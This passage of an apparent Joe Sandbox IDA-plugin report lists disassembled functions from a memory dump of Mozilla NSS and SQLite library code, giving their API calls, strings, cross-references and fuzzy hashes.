PL_HashTableRemove.NSS3(?), ref: 6C5F2E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C5F2E96
PR_Unlock.NSS3 ref: 6C5F2EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5F2EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5F2EC5

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: cfea3664606b418df073cec5b0e93f421f30f0cd481a9f9361e51e3d9d389237
Instruction ID: 2d9d0b460e1d65f677958668cee85ff1c9fc77eb8908bf7f7710655e21843a22
Opcode Fuzzy Hash: cfea3664606b418df073cec5b0e93f421f30f0cd481a9f9361e51e3d9d389237
Instruction Fuzzy Hash: A92129B2E00101A7EF006B64DC49AAB3A79DB9235DF544431EE2C86711FF32C55ADAA2

Function 6C57CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C57B999), ref: 6C57CFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C57B999), ref: 6C57D02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C57B999), ref: 6C57D041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C57B999), ref: 6C6C972B

Strings

database corruption, xrefs: 6C57CFE7, 6C57D013, 6C57D028, 6C57D039, 6C57D03E, 6C6C9786
%s at line %d of [%.10s], xrefs: 6C57CFEC, 6C57D018, 6C57D029, 6C57D03F, 6C6C978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C57CFDD, 6C57D00E, 6C57D022, 6C57D033, 6C6C9780

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 89a76eeb31a776f47ff629f488f4527ef04d989940ca6b1df35ffb91388fdca2
Instruction ID: f9c9db80f0072018cddce53a2ccd854d3a4937e20acca6ad50b1a97621b8ec22
Opcode Fuzzy Hash: 89a76eeb31a776f47ff629f488f4527ef04d989940ca6b1df35ffb91388fdca2
Instruction Fuzzy Hash: AB614B71A042248BD310CF29CC40BA6B7F5EF85318F28456DE4499FB82E376E987C7A1

Function 6C654DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C65536F,00000022,?,?,00000000,?), ref: 6C654E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C654F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C654F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C654FAE
free.MOZGLUE(?), ref: 6C654FC8

Strings

%s=%c%s%c, xrefs: 6C654FA9
%s=%s, xrefs: 6C654F89
oSel", xrefs: 6C654DFB, 6C654EF4, 6C654EC5

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSel"
API String ID: 2709355791-1848301727
Opcode ID: 520d990fef0f0e7b37edd93adf33adc8f546b84fda7493341d4a2dde7d951739
Instruction ID: e439159ce5282532c5517d205d9dbc6d88fc5bc1120959ee18a0411a03ff3d32
Opcode Fuzzy Hash: 520d990fef0f0e7b37edd93adf33adc8f546b84fda7493341d4a2dde7d951739
Instruction Fuzzy Hash: AE517C31B041458BEB01CA6EC4907FF7BF59F82348FB881A5E8D0A7B40D37598368798

Function 6C67EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C69A4A1,?,00000000,?,00000001), ref: 6C67EF6D

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

htonl.WSOCK32(00000000,?,6C69A4A1,?,00000000,?,00000001), ref: 6C67EFE4
htonl.WSOCK32(?,00000000,?,6C69A4A1,?,00000000,?,00000001), ref: 6C67EFF1
memcpy.VCRUNTIME140(?,?,6C69A4A1,?,00000000,?,6C69A4A1,?,00000000,?,00000001), ref: 6C67F00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C69A4A1,?,00000000,?,00000001), ref: 6C67F027

Strings

dtls13, xrefs: 6C67EF33

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 6f9e352536d7ff958b353979fbe27f34a15fd6b793bafe8a2bb539d34b09b23f
Instruction ID: 2b297d0a3c2f6a30d67d0742950454a0b6cb07610f5337b461efdfc18f5f9c71
Opcode Fuzzy Hash: 6f9e352536d7ff958b353979fbe27f34a15fd6b793bafe8a2bb539d34b09b23f
Instruction Fuzzy Hash: 07310571A00215AFC720DF38CC84BCAB7E4AF4535CF258429E8189BB51E735E919CBE9

Function 6C5FAF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5FAFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C719500,6C5F3F91), ref: 6C5FAFD2

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

DER_GetInteger_Util.NSS3(?), ref: 6C5FB007

Part of subcall function 6C646A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C5F1666,?,6C5FB00C,?), ref: 6C646AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5FB02F
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C5FB046
PL_FreeArenaPool.NSS3 ref: 6C5FB058
PL_FinishArenaPool.NSS3 ref: 6C5FB060

Strings

security, xrefs: 6C5FAFB8

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 7b6b209181017f28a26a579df85b24050daefe3eed6f945195619c15869cf123
Instruction ID: 4f8c4f151b16d6665ec829cec628fe47c0bd267521d1416cb0214cff0cc8ad4e
Opcode Fuzzy Hash: 7b6b209181017f28a26a579df85b24050daefe3eed6f945195619c15869cf123
Instruction Fuzzy Hash: 9A31F470404300EBDB109F24DC44BAA77A8AF8636CF644B19E9745BBD1E732954ACB9B

Function 6C62ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C62ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C62AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C62AD23

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C62AD39

Strings

C_MessageDecryptFinal, xrefs: 6C62ACE1
hSession = 0x%x, xrefs: 6C62ACFE, 6C62AD0E
(CK_INVALID_HANDLE), xrefs: 6C62AD1C
npl, xrefs: 6C62AD51, 6C62AD7B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$npl
API String ID: 332880674-1172372041
Opcode ID: f504f3ea65f6899a17e10f24941989dd419dfbc8724c04966707d2c323a3cc77
Instruction ID: 2d732e844a0cfcc8c9e4ad99fd19cb5efcc7930cfc521d753e91d479fc306176
Opcode Fuzzy Hash: f504f3ea65f6899a17e10f24941989dd419dfbc8724c04966707d2c323a3cc77
Instruction Fuzzy Hash: CF21F5707011449FDB009F649D8CBAB77F5EB4631EF844835E809A7B12DF789908CB9A

Function 6C63CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C63CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C63CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C63D079

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 33c064370e83df7475b9bf8db7573f38ffefa2e47eb44fa232b3a3885a635dcc
Instruction ID: 544f984813892adfd4e93ae3c3a56d910261037e5eb1aaf1011ab8c10ea416d2
Opcode Fuzzy Hash: 33c064370e83df7475b9bf8db7573f38ffefa2e47eb44fa232b3a3885a635dcc
Instruction Fuzzy Hash: B6C190B1A002299BDB10DF24CC80BDAB7F4BF49318F1461A8E84D97741E775EA95CF98

Function 6C5F2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(6DA3F8D5), ref: 6C5F2C5D

Part of subcall function 6C650D30: calloc.MOZGLUE ref: 6C650D50
Part of subcall function 6C650D30: TlsGetValue.KERNEL32 ref: 6C650D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C5F2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5F2CE0

Part of subcall function 6C5F2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5F2CDA,?,00000000), ref: 6C5F2E1E
Part of subcall function 6C5F2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C5F2E33
Part of subcall function 6C5F2E00: TlsGetValue.KERNEL32 ref: 6C5F2E4E
Part of subcall function 6C5F2E00: EnterCriticalSection.KERNEL32(?), ref: 6C5F2E5E
Part of subcall function 6C5F2E00: PL_HashTableLookup.NSS3(?), ref: 6C5F2E71
Part of subcall function 6C5F2E00: PL_HashTableRemove.NSS3(?), ref: 6C5F2E84
Part of subcall function 6C5F2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C5F2E96
Part of subcall function 6C5F2E00: PR_Unlock.NSS3 ref: 6C5F2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5F2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C5F2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C5F2D3F
free.MOZGLUE(00000000), ref: 6C5F2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C5F2DB8
free.MOZGLUE ref: 6C5F2DC8

Part of subcall function 6C5F3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5F3EC2
Part of subcall function 6C5F3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5F3ED6
Part of subcall function 6C5F3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5F3EEE
Part of subcall function 6C5F3E60: PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C5F3F02
Part of subcall function 6C5F3E60: PL_FreeArenaPool.NSS3 ref: 6C5F3F14
Part of subcall function 6C5F3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5F3F27

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: b40a5ef9f5a1b855661bfeaa65e47f29e56970f6cf0847b34e6af62cf0106e1e
Instruction ID: 3ab6ed295ec5b652e24d96e84e04f39740b35c4dc757862545277c81f8130d5e
Opcode Fuzzy Hash: b40a5ef9f5a1b855661bfeaa65e47f29e56970f6cf0847b34e6af62cf0106e1e
Instruction Fuzzy Hash: 2451D0B1A042559BEB04DE64CC89B5B77E5EF94348F14083CE869C3650E731E817CFA2

Function 6C6C2F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C2FFD
sqlite3_initialize.NSS3 ref: 6C6C3007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6C3032
sqlite3_mprintf.NSS3(6C72AAF9,?), ref: 6C6C3073
sqlite3_free.NSS3(?), ref: 6C6C30B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C6C30C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C6C30BB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 6f92a62d3bfb70b903ff813c875f25d76e739a99d95dcf66dfe2653ad4763f48
Instruction ID: de9b00162c1de7c24e7d236e9508a891cf568cae99c60171c47740fbdf10e83a
Opcode Fuzzy Hash: 6f92a62d3bfb70b903ff813c875f25d76e739a99d95dcf66dfe2653ad4763f48
Instruction Fuzzy Hash: 2241B072700606ABDB00CF25D840A8AB7B5FF84368F148638EC5987B40E731F995CBD6

Function 6C60E400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C613F23,?), ref: 6C60E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C60E44F

Part of subcall function 6C612C40: TlsGetValue.KERNEL32(#?al,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C62
Part of subcall function 6C612C40: EnterCriticalSection.KERNEL32(0000001C,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C76
Part of subcall function 6C612C40: PL_HashTableLookup.NSS3(00000000,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C86
Part of subcall function 6C612C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C60E477,?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C612C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C613F23,?), ref: 6C60E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C60E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C60E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C613F23,?), ref: 6C60E52F

Strings

#?al, xrefs: 6C60E409

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID: #?al
API String ID: 3106257965-2216037108
Opcode ID: 30fc70165c32d49c6fc7097290f34232dbb45933d5b768cc5ee0e97f4b1336c1
Instruction ID: 763469f969a6b8bfce915c95ad8fc74594d1f5562be0a6b3e207a7f4f346c322
Opcode Fuzzy Hash: 30fc70165c32d49c6fc7097290f34232dbb45933d5b768cc5ee0e97f4b1336c1
Instruction Fuzzy Hash: C5412CB4A04615CFCB05EF78D68455ABBF0FF06304B054969D895AB711EB30E884CBEA

Function 6C608CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C61124D,00000001), ref: 6C608D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C61124D,00000001), ref: 6C608D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C61124D,00000001), ref: 6C608D73
PR_Unlock.NSS3(?,?,?,?,?,6C61124D,00000001), ref: 6C608D8C

Part of subcall function 6C69DD70: TlsGetValue.KERNEL32 ref: 6C69DD8C
Part of subcall function 6C69DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C69DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C61124D,00000001), ref: 6C608DBA

Strings

KRAM, xrefs: 6C608D3E
KRAM, xrefs: 6C608CF9

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 70d06eb33ea3b03e7574732764549bb2a8655064815aa519da7c30bc484806a9
Instruction ID: 6be7b751a66afa981a341448a25b273cc4fff7793f95d8b2b2a019d6279dbf42
Opcode Fuzzy Hash: 70d06eb33ea3b03e7574732764549bb2a8655064815aa519da7c30bc484806a9
Instruction Fuzzy Hash: F2216BB1B04601CBCB04EF38C68459AB7F0FF49308F158A7AD89897751EB34D845CB99

Function 6C700ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C700EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C700EFA

Part of subcall function 6C5EAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C5EAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C700F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C700ED9, 6C700EE5, 6C700F06, 6C700F0B
Aborting, xrefs: 6C700EB3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 5b0b1e48962ff8e2a2be937df761bca3b7ff64c2e878661af74600a7b87df9f2
Instruction ID: 5fde183f3e3f57f0f36ca855a777288a0411e6d7e1cb42f7c6ffa84ae7376316
Opcode Fuzzy Hash: 5b0b1e48962ff8e2a2be937df761bca3b7ff64c2e878661af74600a7b87df9f2
Instruction Fuzzy Hash: 6A01CCB6A00114ABDF01AF64DD4A8AB3F7CEF46278B048075FD0987B02D631ED149BE2

Function 6C6C4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6C4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6C4DE0

Strings

invalid, xrefs: 6C6C4DB8
